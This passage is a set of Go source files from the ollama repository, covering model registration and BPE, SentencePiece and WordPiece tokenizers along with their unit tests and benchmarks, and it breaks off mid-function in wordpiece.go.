626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/model.go
model/model.go
package model import ( "errors" "fmt" _ "image/jpeg" _ "image/png" "log/slog" "os" "reflect" "strconv" "strings" _ "golang.org/x/image/bmp" _ "golang.org/x/image/tiff" _ "golang.org/x/image/webp" "github.com/ollama/ollama/fs" fsggml "github.com/ollama/ollama/fs/ggml" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/logutil" "github.com/ollama/ollama/ml" _ "github.com/ollama/ollama/ml/backend" "github.com/ollama/ollama/ml/nn/pooling" "github.com/ollama/ollama/model/input" ) var ( ErrNoVisionModel = errors.New("this model is missing data required for image input") ErrUnsupportedModel = errors.New("model not supported") ErrUnsupportedTokenizer = errors.New("tokenizer not supported") ) // Model implements a specific model architecture, defining the forward pass and any model-specific configuration type Model interface { Forward(ml.Context, input.Batch) (ml.Tensor, error) Backend() ml.Backend Config() config } // MultimodalProcessor must be implemented by multimodal models. type MultimodalProcessor interface { // EncodeMultimodal processes a single input (such as an image) and // generates an output (typically an embedding) that can be used by the model. // // The return value is one or more tensors, each with optional model-specific // opaque metadata. Typically, the tensors might be views into an embedding // with each view representing a chunk of data that can be processed independently // in different batches. // // The result may be cached by the runner. EncodeMultimodal(ml.Context, []byte) ([]input.Multimodal, error) // PostTokenize is called after tokenization to allow the model to edit the // input stream to correctly arrange multimodal elements. // // The input is a slice of tokens with the results of EncodeMultimodal interleaved // in the order that the user provided them. Each element of the slice will be // either a single token or single multimodal object. // // The model must ensure that inputs are stored according to how they will be // processed and stored in the cache. For example, Llava-style models should insert // placeholder tokens equal to the feature size of the corresponding image with // the image itself attached to and split across these tokens. When Forward is called // a partial subset of these tokens may be submitted according to the batch size. // // This function is also responsible for updating MultimodalHash for any Multimodal // that is modified to ensure that there is a unique hash value that accurately // represents the contents. PostTokenize([]*input.Input) ([]*input.Input, error) } // Base implements the common fields and methods for all models type Base struct { b ml.Backend config } type config struct { Cache kvcache.Cache } // Backend returns the underlying backend that will run the model func (m *Base) Backend() ml.Backend { return m.b } func (m *Base) Config() config { return m.config } var models = make(map[string]func(fs.Config) (Model, error)) // Register registers a model constructor for the given architecture func Register(name string, f func(fs.Config) (Model, error)) { if _, ok := models[name]; ok { panic("model: model already registered") } models[name] = f } // New initializes a new model instance with the provided configuration based on the metadata in the model file func New(modelPath string, params ml.BackendParams) (Model, error) { b, err := ml.NewBackend(modelPath, params) if err != nil { return nil, err } m, err := modelForArch(b.Config()) if err != nil { return nil, err } base := Base{b: b, config: m.Config()} v := reflect.ValueOf(m) v.Elem().Set(populateFields(base, v.Elem())) return m, nil } func NewTextProcessor(s string) (TextProcessor, error) { r, err := os.Open(s) if err != nil { return nil, err } defer r.Close() meta, err := fsggml.Decode(r, -1) if err != nil { return nil, err } m, err := modelForArch(meta.KV()) if err != nil { return nil, err } tp, ok := m.(TextProcessor) if !ok { return nil, ErrUnsupportedTokenizer } return tp, nil } func modelForArch(c fs.Config) (Model, error) { arch := c.Architecture() if pooling.Type(c.Uint("pooling_type")) != pooling.TypeNone { arch = arch + "_embed" } f, ok := models[arch] if !ok { return nil, ErrUnsupportedModel } return f(c) } func populateFields(base Base, v reflect.Value, tags ...Tag) reflect.Value { t := v.Type() if t.Kind() == reflect.Struct { allNil := true for i := range t.NumField() { tt := t.Field(i).Type vv := v.Field(i) if !vv.CanSet() { continue } // make a copy tagsCopy := tags if tag := t.Field(i).Tag.Get("gguf"); tag != "" { tagsCopy = append(tagsCopy, parseTag(tag)) } if tt == reflect.TypeOf((*Base)(nil)).Elem() { vv.Set(reflect.ValueOf(base)) } else if tt == reflect.TypeOf((*ml.Tensor)(nil)).Elem() { var fn func([]Tag, string, string) [][]string fn = func(tags []Tag, prefix, suffix string) (fullNames [][]string) { if len(tags) > 0 { var names []string if tags[0].name != "" { for _, n := range append([]string{tags[0].name}, tags[0].alternatives...) { names = append(names, prefix+n+suffix) } } childNames := fn(tags[1:], tags[0].prefix, tags[0].suffix) if len(names) == 0 { // current tag has no name, use child names only fullNames = append(fullNames, childNames...) } else if len(childNames) == 0 { // current tag has names but no children, create branches for each name for _, name := range names { fullNames = append(fullNames, []string{name}) } } else { // merge each name with each child for _, name := range names { for _, childName := range childNames { fullNames = append(fullNames, append([]string{name}, childName...)) } } } } return fullNames } names := fn(tagsCopy, "", "") for _, name := range names { if tensor := base.Backend().Get(strings.Join(name, ".")); tensor != nil { logutil.Trace("found tensor", "", tensor) vv.Set(reflect.ValueOf(tensor)) break } } } else if tt.Kind() == reflect.Pointer || tt.Kind() == reflect.Interface { setPointer(base, vv, tagsCopy) } else if tt.Kind() == reflect.Slice || tt.Kind() == reflect.Array { for i := range vv.Len() { vvv := vv.Index(i) if vvv.Kind() == reflect.Pointer || vvv.Kind() == reflect.Interface { setPointer(base, vvv, append(tagsCopy, Tag{name: strconv.Itoa(i)})) } else { vvv.Set(populateFields(base, vvv, append(tagsCopy, Tag{name: strconv.Itoa(i)})...)) } } } if !canNil(tt) || !vv.IsNil() { allNil = false } } if allNil { return reflect.Zero(t) } } return v } func setPointer(base Base, v reflect.Value, tags []Tag) { vv := v if v.Kind() == reflect.Interface { if v.IsNil() { return } vv = vv.Elem() } vv = reflect.Indirect(vv) if v.IsNil() { vv = reflect.New(v.Type().Elem()).Elem() } if f := populateFields(base, vv, tags...); f.CanAddr() { v.Set(f.Addr()) } } type Tag struct { name, // prefix and suffix are applied to child tags prefix, suffix string alternatives []string } func parseTag(s string) (tag Tag) { parts := strings.Split(s, ",") if len(parts) > 0 { tag.name = parts[0] for _, part := range parts[1:] { if value, ok := strings.CutPrefix(part, "alt:"); ok && tag.name == "" { // elevate alternative to primary if no primary given tag.name = value slog.Warn("gguf tag has alt: but no primary name", "tag", s) } else if ok { tag.alternatives = append(tag.alternatives, value) } if value, ok := strings.CutPrefix(part, "pre:"); ok { tag.prefix = value } if value, ok := strings.CutPrefix(part, "suf:"); ok { tag.suffix = value } } } return } func canNil(t reflect.Type) bool { return t.Kind() == reflect.Chan || t.Kind() == reflect.Func || t.Kind() == reflect.Interface || t.Kind() == reflect.Map || t.Kind() == reflect.Pointer || t.Kind() == reflect.Slice } func Forward(ctx ml.Context, m Model, batch input.Batch) (ml.Tensor, error) { if len(batch.Positions) != len(batch.Sequences) { return nil, fmt.Errorf("length of positions (%v) must match length of seqs (%v)", len(batch.Positions), len(batch.Sequences)) } if len(batch.Positions) < 1 { return nil, errors.New("batch size cannot be less than 1") } cache := m.Config().Cache if cache != nil { err := cache.StartForward(ctx, batch, false) if err != nil { return nil, err } } t, err := m.Forward(ctx, batch) if err != nil { return nil, err } ctx.Forward(t) return t, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/vocabulary_test.go
model/vocabulary_test.go
package model import ( "testing" "github.com/google/go-cmp/cmp" ) func TestSpecialVocabulary(t *testing.T) { vocab := &Vocabulary{ Values: []string{"<|startoftext|>", "<|endoftext|>", "<|tool_call_start|>", "<|tool_call_end|>", "hi"}, Types: []int32{TOKEN_TYPE_CONTROL, TOKEN_TYPE_CONTROL, TOKEN_TYPE_USER_DEFINED, TOKEN_TYPE_USER_DEFINED, TOKEN_TYPE_NORMAL}, } specialVocab := vocab.SpecialVocabulary() if len(specialVocab) != 4 { t.Errorf("expected 4 special tokens, got %d", len(specialVocab)) } } func TestAddSpecialVocabulary(t *testing.T) { cases := []struct { name string vocab *Vocabulary input []int32 want []int32 }{ { name: "add bos", vocab: &Vocabulary{ BOS: []int32{0}, EOS: []int32{1}, AddBOS: true, AddEOS: false, }, input: []int32{2, 3, 4}, want: []int32{0, 2, 3, 4}, }, { // TODO(mxyng): this is to match previous behaviour name: "add bos when already present", vocab: &Vocabulary{ BOS: []int32{0}, EOS: []int32{1}, AddBOS: true, AddEOS: false, }, input: []int32{0, 2, 3, 4}, want: []int32{0, 0, 2, 3, 4}, }, { name: "add eos", vocab: &Vocabulary{ BOS: []int32{0}, EOS: []int32{1}, AddBOS: false, AddEOS: true, }, input: []int32{2, 3, 4}, want: []int32{2, 3, 4, 1}, }, { // TODO(mxyng): this is to match previous behaviour name: "add eos when already present", vocab: &Vocabulary{ BOS: []int32{0}, EOS: []int32{1}, AddBOS: false, AddEOS: true, }, input: []int32{2, 3, 4, 1}, want: []int32{2, 3, 4, 1, 1}, }, { name: "add both", vocab: &Vocabulary{ BOS: []int32{0}, EOS: []int32{1}, AddBOS: true, AddEOS: true, }, input: []int32{2, 3, 4}, want: []int32{0, 2, 3, 4, 1}, }, { name: "add bos to empty inputs", vocab: &Vocabulary{ BOS: []int32{0}, EOS: []int32{1}, AddBOS: true, AddEOS: false, }, input: []int32{}, want: []int32{0}, }, } for _, tt := range cases { t.Run(tt.name, func(t *testing.T) { got := tt.vocab.addSpecials(tt.input) if diff := cmp.Diff(tt.want, got); diff != "" { t.Errorf("no match (-want +got):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/bytepairencoding_test.go
model/bytepairencoding_test.go
package model import ( "bufio" "encoding/json" "math" "os" "path/filepath" "slices" "strconv" "strings" "testing" "github.com/google/go-cmp/cmp" ) func llama(t testing.TB) BytePairEncoding { t.Helper() f, err := os.Open(filepath.Join("testdata", "llama3.2", "encoder.json")) if err != nil { t.Fatal(err) } defer f.Close() vocab := make(map[string]int32) if err := json.NewDecoder(f).Decode(&vocab); err != nil { t.Fatal(err) } types := make([]int32, len(vocab)) tokens := make([]string, len(vocab)) for token, id := range vocab { tokens[id] = token types[id] = 1 } for _, token := range []string{"<|begin_of_text|>", "<|end_of_text|>"} { if _, ok := vocab[token]; !ok { tokens = append(tokens, token) //nolint:makezero types = append(types, 3) //nolint:makezero vocab[token] = int32(len(vocab)) } } f, err = os.Open(filepath.Join("testdata", "llama3.2", "vocab.bpe")) if err != nil { t.Fatal(err) } defer f.Close() merges := make([]string, 0, 50000) scanner := bufio.NewScanner(f) for scanner.Scan() { if !strings.HasPrefix(scanner.Text(), "#") { merges = append(merges, scanner.Text()) } } return NewBytePairEncoding( &Vocabulary{ Values: tokens, Types: types, Merges: merges, }, "(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\\r\\n\\p{L}\\p{N}]?\\p{L}+|\\p{N}{1,3}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+", ) } func TestLlama(t *testing.T) { tokenizer := llama(t) t.Run("simple", func(t *testing.T) { t.Parallel() ids, err := tokenizer.Encode("hello world", true) if err != nil { t.Error(err) } if diff := cmp.Diff([]int32{15339, 1917}, ids); diff != "" { t.Errorf("no match (-theirs +ours):\n%s", diff) } s, err := tokenizer.Decode([]int32{15339, 1917}) if err != nil { t.Fatal(err) } if s != "hello world" { t.Errorf("got %q, want hello world", s) } ids, err = tokenizer.Encode("hello <|end_of_text|>", true) if err != nil { t.Error(err) } if diff := cmp.Diff([]int32{15339, 220, 128001}, ids); diff != "" { t.Errorf("no match (-theirs +ours):\n%s", diff) } }) t.Run("simple repeated", func(t *testing.T) { t.Parallel() cases := map[string][]int32{ strings.Repeat("0", 1): {15}, strings.Repeat("0", 2): {410}, strings.Repeat("0", 3): {931}, strings.Repeat("0", 4): {931, 15}, strings.Repeat("0", 5): {931, 410}, strings.Repeat("0", 6): {931, 931}, strings.Repeat("0", 7): {931, 931, 15}, strings.Repeat("0", 8): {931, 931, 410}, strings.Repeat("0", 9): {931, 931, 931}, strings.Repeat("0", 10): {931, 931, 931, 15}, strings.Repeat("0", 11): {931, 931, 931, 410}, strings.Repeat("0", 12): {931, 931, 931, 931}, strings.Repeat("0", 13): {931, 931, 931, 931, 15}, strings.Repeat("0", 14): {931, 931, 931, 931, 410}, strings.Repeat("0", 15): {931, 931, 931, 931, 931}, strings.Repeat("0", 16): {931, 931, 931, 931, 931, 15}, strings.Repeat("0", 17): {931, 931, 931, 931, 931, 410}, } for s, want := range cases { ids, err := tokenizer.Encode(s, true) if err != nil { t.Error(err) } if diff := cmp.Diff(want, ids); diff != "" { t.Errorf("%q no match (-theirs +ours):\n%s", s, diff) } } }) t.Run("basic roundtrip", func(t *testing.T) { t.Parallel() cases := []string{ "hello", "hello ", "hello ", " hello", " hello ", " hello ", "hello world", "请考试我的软件!12345", } for _, want := range cases { ids, err := tokenizer.Encode(want, true) if err != nil { t.Error(err) } if got, err := tokenizer.Decode(ids); err != nil { t.Fatal(err) } else if got != want { t.Errorf("got %q, want %q", got, want) } } }) t.Run("special", func(t *testing.T) { t.Parallel() cases := map[string][]int32{ "<|begin_of_text|>A B!": {128000, 32, 426, 0}, "<|begin_of_text|>A<|end_of_text|>B!": {128000, 32, 128001, 33, 0}, "<|begin_of_text|>A<|end_of_text|>B<|begin_of_text|>!": {128000, 32, 128001, 33, 128000, 0}, "<|begin_of_text|>A<|end_of_text|>B<|begin_of_text|>!<|end_of_text|>": {128000, 32, 128001, 33, 128000, 0, 128001}, } for s, want := range cases { ids, err := tokenizer.Encode(s, true) if err != nil { t.Fatal(err) } if diff := cmp.Diff(want, ids); diff != "" { t.Errorf("no match (-theirs +ours):\n%s", diff) } } }) t.Run("split", func(t *testing.T) { t.Parallel() cases := map[string][]string{ "Hello World!": {"Hello", " World", "!"}, "I'm don't won't": {"I", "'m", " don", "'t", " won", "'t"}, "In 2024 there are 366 days": {"In", " ", "202", "4", " there", " are", " ", "366", " days"}, "Hello!! ...world": {"Hello", "!!", " ...", "world"}, "Hello World": {"Hello", " ", " World"}, "Hello\nWorld": {"Hello", "\n", "World"}, "Hello, WORLD!! How's it going?": {"Hello", ",", " WORLD", "!!", " How", "'s", " it", " going", "?"}, } for s, want := range cases { got := slices.Collect(tokenizer.split(s)) if diff := cmp.Diff(want, got); diff != "" { t.Errorf("no match (-theirs +ours):\n%s", diff) } } }) t.Run("roundtriping 0x00-0xFF", func(t *testing.T) { t.Parallel() for b := 0x00; b <= 0xFF; b++ { input := string(rune(b)) ids, err := tokenizer.Encode(input, false) if err != nil { t.Errorf("failed to encode rune 0x%02X: %v", b, err) continue } decoded, err := tokenizer.Decode(ids) if err != nil { t.Errorf("failed to decode rune 0x%02X: %v", b, err) continue } if b == 0x00 { if len(decoded) != 0 { t.Errorf("Decode(Encode(0x00)) should be empty, got %v", ids) } continue } if decoded != input { t.Errorf("rune 0x%02X failed roundtrip: got %q, want %q", b, decoded, input) } } }) } func BenchmarkBytePairEncoding(b *testing.B) { tokenizer := llama(b) bts, err := os.ReadFile(filepath.Join("testdata", "war-and-peace.txt")) if err != nil { b.Fatal(err) } for i := range 8 { n := min(int(math.Pow10(i)), len(bts)) bts := bts[:n] b.Run("encode"+strconv.Itoa(n), func(b *testing.B) { b.ResetTimer() for b.Loop() { _, err := tokenizer.Encode(string(bts), true) if err != nil { b.Fatal(err) } } }) b.Run("decode"+strconv.Itoa(n), func(b *testing.B) { ids, err := tokenizer.Encode(string(bts), true) if err != nil { b.Fatal(err) } b.ResetTimer() for b.Loop() { _, err := tokenizer.Decode(ids) if err != nil { b.Fatal(err) } } }) b.Run("split"+strconv.Itoa(n), func(b *testing.B) { b.ResetTimer() for b.Loop() { slices.Collect(tokenizer.split(string(bts))) } }) } } func TestSplit(t *testing.T) { cases := []struct { name string patterns, want []string }{ { name: "default", want: []string{"Hello", ",", " WORLD", "!!", " How", "'s", " it", " going", "?", " 123", " 一二三"}, }, { name: "unicode", patterns: []string{ "\\p{N}{1,3}", `[一-龥぀-ゟ゠-ヿ]+`, "[!\"#$%&'()*+,\\-./:;<=>?@\\[\\\\\\]^_`{|}~][A-Za-z]+|[^\r\n\\p{L}\\p{P}\\p{S}]?[\\p{L}\\p{M}]+| ?[\\p{P}\\p{S}]+[\r\n]*|\\s*[\r\n]+|\\s+(?!\\S)|\\s+", }, want: []string{"Hello", ",", " WORLD", "!!", " How", "'s", " it", " going", "?", " ", "123", " ", "一二三"}, }, { name: "individual digits", patterns: []string{ "(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\\r\\n\\p{L}\\p{N}]?\\p{L}+|\\p{N}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+", }, want: []string{"Hello", ",", " WORLD", "!!", " How", "'s", " it", " going", "?", " ", "1", "2", "3", " 一二三"}, }, } for _, tt := range cases { t.Run(tt.name, func(t *testing.T) { tokenizer := NewBytePairEncoding(nil, tt.patterns...) if diff := cmp.Diff(tt.want, slices.Collect(tokenizer.split("Hello, WORLD!! How's it going? 123 一二三"))); diff != "" { t.Errorf("no match (-theirs +ours):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/bytepairencoding.go
model/bytepairencoding.go
package model import ( "cmp" "iter" "slices" "strings" "github.com/dlclark/regexp2" heap "github.com/emirpasic/gods/v2/trees/binaryheap" "github.com/ollama/ollama/logutil" ) type BytePairEncoding struct { vocab *Vocabulary regexps []*regexp2.Regexp } var _ TextProcessor = (*BytePairEncoding)(nil) func NewBytePairEncoding(vocab *Vocabulary, pretokenizers ...string) BytePairEncoding { if len(pretokenizers) == 0 { // set default byte-level pretokenizer if none provided, e.g. // https://github.com/huggingface/tokenizers/blob/main/tokenizers/src/pre_tokenizers/byte_level.rs#L44 pretokenizers = []string{`'s|'t|'re|'ve|'m|'ll|'d| ?\p{L}+| ?\p{N}+| ?[^\s\p{L}\p{N}]+|\s+(?!\S)|\s+`} } return BytePairEncoding{ vocab: vocab, regexps: slices.Collect(func(yield func(*regexp2.Regexp) bool) { for _, p := range pretokenizers { if !yield(regexp2.MustCompile(p, regexp2.RE2)) { return } } }), } } func (bpe BytePairEncoding) Vocabulary() *Vocabulary { return bpe.vocab } func (bpe BytePairEncoding) Is(id int32, special Special) bool { return bpe.vocab.Is(id, special) } func (bpe *BytePairEncoding) split(s string) iter.Seq[string] { parts := []string{s} for _, re := range bpe.regexps { parts = slices.Collect(func(yield func(string) bool) { for _, part := range parts { r := []rune(part) var offset int for m, _ := re.FindRunesMatch(r); m != nil; m, _ = re.FindNextMatch(m) { if offset-m.Index != 0 { if !yield(string(r[:m.Index])) { return } } if !yield(m.String()) { return } offset = m.Index + m.Length } if offset < len(r) { if !yield(string(r[offset:])) { return } } } }) } return slices.Values(parts) } // fragment is a string fragment and their corresponding token IDs type fragment struct { value string ids []int32 } // pair is a pair of runes and its rank type pair struct { a, b int rank int value string } type merge struct { p, n int runes []rune } func (bpe BytePairEncoding) Encode(s string, addSpecial bool) ([]int32, error) { fragments := []fragment{{value: s}} for _, special := range bpe.vocab.SpecialVocabulary() { // TODO: process special tokens concurrently id := bpe.vocab.Encode(special) for i := 0; i < len(fragments); i++ { frag := fragments[i] if len(frag.ids) > 0 { continue } var middle []fragment switch i := strings.Index(frag.value, special); { case i < 0: middle = append(middle, frag) case i > 0: middle = append(middle, fragment{value: frag.value[:i]}) fallthrough default: middle = append(middle, fragment{value: special, ids: []int32{id}}) if rest := frag.value[i+len(special):]; rest != "" { middle = append(middle, fragment{value: rest}) } } fragments = append(fragments[:i], append(middle, fragments[i+1:]...)...) } } var ids []int32 for _, frag := range fragments { if len(frag.ids) > 0 { ids = append(ids, frag.ids...) continue } for split := range bpe.split(frag.value) { // TODO: process splits concurrently var sb strings.Builder for _, b := range []byte(split) { r := rune(b) switch { case r == 0x00ad: r = 0x0143 case r <= 0x0020: r = r + 0x0100 case r >= 0x007f && r <= 0x00a0: r = r + 0x00a2 } sb.WriteRune(r) } // short circuit if the fragment is in the vocabulary if id := bpe.vocab.Encode(sb.String()); id >= 0 { ids = append(ids, id) continue } runes := []rune(sb.String()) merges := make([]merge, len(runes)) for r := range runes { merges[r] = merge{ p: r - 1, n: r + 1, runes: []rune{runes[r]}, } } pairwise := func(a, b int) *pair { if a < 0 || b >= len(runes) { return nil } left, right := string(merges[a].runes), string(merges[b].runes) rank := bpe.vocab.Merge(left, right) if rank < 0 { return nil } return &pair{ a: a, b: b, rank: rank, value: left + right, } } pairs := heap.NewWith(func(i, j *pair) int { return cmp.Compare(i.rank, j.rank) }) for i := range len(runes) - 1 { if pair := pairwise(i, i+1); pair != nil { pairs.Push(pair) } } for !pairs.Empty() { pair, _ := pairs.Pop() left, right := merges[pair.a], merges[pair.b] if len(left.runes) == 0 || len(right.runes) == 0 || string(left.runes)+string(right.runes) != pair.value { continue } if id := bpe.vocab.Encode(pair.value); id < 0 { continue } merges[pair.a].runes = append(left.runes, right.runes...) merges[pair.b].runes = nil merges[pair.a].n = right.n if right.n < len(merges) { merges[right.n].p = pair.a } if pair := pairwise(merges[pair.a].p, pair.a); pair != nil { pairs.Push(pair) } if pair := pairwise(pair.a, merges[pair.a].n); pair != nil { pairs.Push(pair) } } for _, merge := range merges { if len(merge.runes) > 0 { // TODO: handle the edge case where the rune isn't in the vocabulary if id := bpe.vocab.Encode(string(merge.runes)); id >= 0 { ids = append(ids, id) } } } } } if addSpecial { ids = bpe.vocab.addSpecials(ids) } logutil.Trace("encoded", "string", s, "ids", ids) return ids, nil } func (bpe BytePairEncoding) Decode(ids []int32) (string, error) { var sb strings.Builder for _, id := range ids { for _, r := range bpe.vocab.Decode(id) { switch { case r == 0x0100: // this produces 0x00 aka NULL continue case r == 0x0143: r = 0x00ad case r > 0x0100 && r <= 0x0120: r = r - 0x0100 case r > 0x0120 && r <= 0x0142: r = r - 0x00a2 } // NOTE: not using WriteRune here because it writes the UTF-8 // encoding of the rune which is _not_ what we want if err := sb.WriteByte(byte(r)); err != nil { return "", err } } } logutil.Trace("decoded", "string", sb.String(), "from", ids) return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/sentencepiece.go
model/sentencepiece.go
package model import ( "container/heap" "fmt" "log/slog" "strconv" "strings" "github.com/ollama/ollama/logutil" ) const spmWhitespaceSep = "▁" type SentencePiece struct { maxTokenLen int vocab *Vocabulary } var _ TextProcessor = (*SentencePiece)(nil) func (spm SentencePiece) Vocabulary() *Vocabulary { return spm.vocab } func NewSentencePiece(vocab *Vocabulary) SentencePiece { logutil.Trace("Tokens", "num tokens", len(vocab.Values), "vals", vocab.Values[:5], "scores", vocab.Scores[:5], "types", vocab.Types[:5]) counter := map[int]int{} var maxTokenLen int for cnt := range vocab.Types { switch vocab.Types[cnt] { case TOKEN_TYPE_NORMAL, TOKEN_TYPE_USER_DEFINED, TOKEN_TYPE_UNUSED: maxTokenLen = max(maxTokenLen, len(vocab.Values[cnt])) fallthrough default: counter[int(vocab.Types[cnt])] += 1 } } logutil.Trace("Token counts", "normal", counter[TOKEN_TYPE_NORMAL], "unknown", counter[TOKEN_TYPE_UNKNOWN], "control", counter[TOKEN_TYPE_CONTROL], "user defined", counter[TOKEN_TYPE_USER_DEFINED], "unused", counter[TOKEN_TYPE_UNUSED], "byte", counter[TOKEN_TYPE_BYTE], "max token len", maxTokenLen) return SentencePiece{ maxTokenLen: maxTokenLen, vocab: vocab, } } func (spm SentencePiece) Is(id int32, special Special) bool { return spm.vocab.Is(id, special) } func (spm SentencePiece) Encode(s string, addSpecial bool) ([]int32, error) { fragments := []fragment{{value: s}} for _, special := range spm.vocab.SpecialVocabulary() { id := spm.vocab.Encode(special) for i := 0; i < len(fragments); i++ { frag := fragments[i] if len(frag.ids) > 0 { continue } var middle []fragment switch i := strings.Index(frag.value, special); { case i < 0: middle = append(middle, frag) case i > 0: middle = append(middle, fragment{value: frag.value[:i]}) fallthrough default: middle = append(middle, fragment{value: special, ids: []int32{id}}) if rest := frag.value[i+len(special):]; rest != "" { middle = append(middle, fragment{value: rest}) } } fragments = append(fragments[:i], append(middle, fragments[i+1:]...)...) } } var ids []int32 for _, frag := range fragments { if len(frag.ids) > 0 { ids = append(ids, frag.ids...) continue } text := strings.ReplaceAll(frag.value, " ", spmWhitespaceSep) if id := spm.vocab.Encode(text); id >= 0 { ids = append(ids, id) continue } q := &queue{} heap.Init(q) runes := []rune(text) merges := make([]merge, len(runes)) for r := range runes { merges[r] = merge{ p: r - 1, n: r + 1, runes: []rune{runes[r]}, } } pairwise := func(a, b int) *candidate { if a < 0 || b >= len(runes) { return nil } left, right := string(merges[a].runes), string(merges[b].runes) if id := spm.vocab.Encode(left + right); id >= 0 { return &candidate{ a: a, b: b, score: spm.vocab.Scores[id], size: len(left) + len(right), } } return nil } for i := range len(runes) - 1 { if pair := pairwise(i, i+1); pair != nil { heap.Push(q, pair) } } for q.Len() > 0 { pair := heap.Pop(q).(*candidate) left, right := merges[pair.a], merges[pair.b] if string(left.runes) == "" || string(right.runes) == "" || len(string(left.runes))+len(string(right.runes)) != pair.size { continue } merges[pair.a].runes = append(left.runes, right.runes...) merges[pair.b].runes = nil merges[pair.a].n = right.n if right.n < len(merges) { merges[right.n].p = pair.a } if pair := pairwise(merges[pair.a].p, pair.a); pair != nil { heap.Push(q, pair) } if pair := pairwise(pair.a, merges[pair.a].n); pair != nil { heap.Push(q, pair) } } for _, merge := range merges { if token := string(merge.runes); token != "" { id := spm.vocab.Encode(token) if id >= 0 { ids = append(ids, id) continue } // Fallback to byte tokenization var result []int32 for _, b := range []byte(token) { byteToken := fmt.Sprintf("<0x%02X>", b) unknownID := spm.vocab.Encode(byteToken) if unknownID >= 0 { result = append(result, unknownID) } else { slog.Debug("unknown byte token", "byte", b, "token", byteToken) } } ids = append(ids, result...) } } } if addSpecial { ids = spm.vocab.addSpecials(ids) } logutil.Trace("encoded", "string", s, "ids", ids) return ids, nil } type candidate struct { a, b int score float32 size int } type queue []*candidate func (q queue) Len() int { return len(q) } func (q queue) Less(i, j int) bool { return (q[i].score > q[j].score) || (q[i].score == q[j].score && q[i].a < q[j].a) } func (q queue) Swap(i, j int) { q[i], q[j] = q[j], q[i] } func (q *queue) Push(x interface{}) { item := x.(*candidate) *q = append(*q, item) } func (q *queue) Pop() interface{} { old := *q n := len(old) item := old[n-1] *q = old[0 : n-1] return item } func (spm SentencePiece) Decode(ids []int32) (string, error) { var sb strings.Builder for _, id := range ids { data := spm.vocab.Decode(id) data = strings.ReplaceAll(data, spmWhitespaceSep, " ") // For tokenizers that use byte tokens like "<0xEA>" // convert them to the partial unicode character // so they are buffered correctly by the runner instead // of being sent back to the api as "<0xEA>" if len(data) == 6 && strings.HasPrefix(data, "<0x") && strings.HasSuffix(data, ">") { byteVal, err := strconv.ParseUint(data[1:5], 0, 8) if err != nil { return "", fmt.Errorf("failed to parse hex byte: %v", err) } if err := sb.WriteByte(byte(byteVal)); err != nil { return "", err } } else { if _, err := sb.WriteString(data); err != nil { return "", err } } } logutil.Trace("decoded", "ids", ids, "string", sb.String()) return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/wordpiece.go
model/wordpiece.go
package model import ( "fmt" "iter" "strings" "unicode" "github.com/ollama/ollama/logutil" ) type WordPiece struct { vocab *Vocabulary lowercase bool } // ggmlPrefix is the prefix used by GGML vocabularies to indicate word boundaries. // this differs from original word piece which uses "##" to indicate subwords. const ggmlPrefix = "▁" var wordPieceReplacer = strings.NewReplacer( " .", ".", " ?", "?", " !", "!", " ,", ",", " ' ", "'", " n't", "n't", " 'm", "'m", " do not", " don't", " 's", "'s", " 've", "'ve", " 're", "'re", ) // Decode implements TextProcessor. func (wpm WordPiece) Decode(ids []int32) (string, error) { var sb strings.Builder for i, id := range ids { if id < 0 || int(id) >= len(wpm.vocab.Values) { return "", fmt.Errorf("invalid token id: %d", id) } var separator string piece := wpm.vocab.Values[id] if i > 0 && (strings.HasPrefix(piece, ggmlPrefix) || (strings.HasPrefix(piece, "[") && strings.HasSuffix(piece, "]"))) { separator = " " } sb.WriteString(wordPieceReplacer.Replace(separator + strings.TrimPrefix(piece, ggmlPrefix))) } return sb.String(), nil } // words splits a string into words, treating CJK characters as separate words. // TODO: this is specifically for BERT and may need to be adjusted or refactored for other models. func (wpm WordPiece) words(s string) iter.Seq[string] { return func(yield func(string) bool) { runes := make([]rune, 0, len(s)*3) for _, r := range s { switch { case r >= 0x4E00 && r <= 0x9FFF, r >= 0x3400 && r <= 0x4DBF, r >= 0x20000 && r <= 0x2A6DF, r >= 0x2A700 && r <= 0x2B73F, r >= 0x2B740 && r <= 0x2B81F, r >= 0x2B820 && r <= 0x2CEAF, r >= 0xF900 && r <= 0xFAFF, r >= 0x2F800 && r <= 0x2FA1F: runes = append(runes, ' ', r, ' ') default: runes = append(runes, r) } } for w := range strings.FieldsFuncSeq(string(runes), unicode.IsSpace) { // split on but keep punctuation var start int for start < len(w) { end := strings.IndexFunc(w[start:], unicode.IsPunct) if end < 0 { end = len(w) - start } else if end == 0 { end = 1 } if !yield(w[start : start+end]) { return } start += end } } } } // Encode implements TextProcessor. func (wpm WordPiece) Encode(s string, addSpecial bool) ([]int32, error) { var ids []int32 // TODO: use [UNK] from config unk := wpm.vocab.Encode("[UNK]") for word := range wpm.words(s) { var start int var pieces []int32 for start < len(word) { end := 